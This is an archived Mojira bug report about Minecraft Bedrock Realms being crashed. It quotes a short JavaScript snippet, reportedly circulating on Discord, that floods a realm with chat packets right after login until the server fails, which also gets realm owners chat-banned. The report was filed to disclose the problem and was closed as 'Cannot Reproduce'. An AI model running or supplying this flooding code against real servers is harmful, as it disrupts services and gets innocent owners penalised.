Mojira Archive
REALMS-11727

Realm can be crashed with code (provided)

This code is being used to crash realms. 

This is also causing the owners of the realm to get communication banned on xbox because of the chat spam

Source is from discord called "crashary 2" a rival to the people that mainly Use this "Anti PTW movement" (discord.gg/antip2w)

 
client.on("play_status", (packet) => {
    if (packet.status !== "login_success") return;

    let interval = setInterval(() => {
        client.write("text",

{             type: "chat",             needs_translation: false,             source_name: "",             message: "hi im new whats this realm about",             xuid: "",             platform_chat_id: ""         }

);
    }, 0);

    setTimeout(() =>

{         client.disconnect();         clearInterval(interval);     }

, 75);
})

Cannot Reproduce

pugsquash2

2024-03-21, 03:32 AM

2024-07-12, 07:27 PM

2024-07-12, 07:27 PM

0

0

Unconfirmed

1265828

1.20.71 (Bedrock), 1.20.72 (Bedrock)

-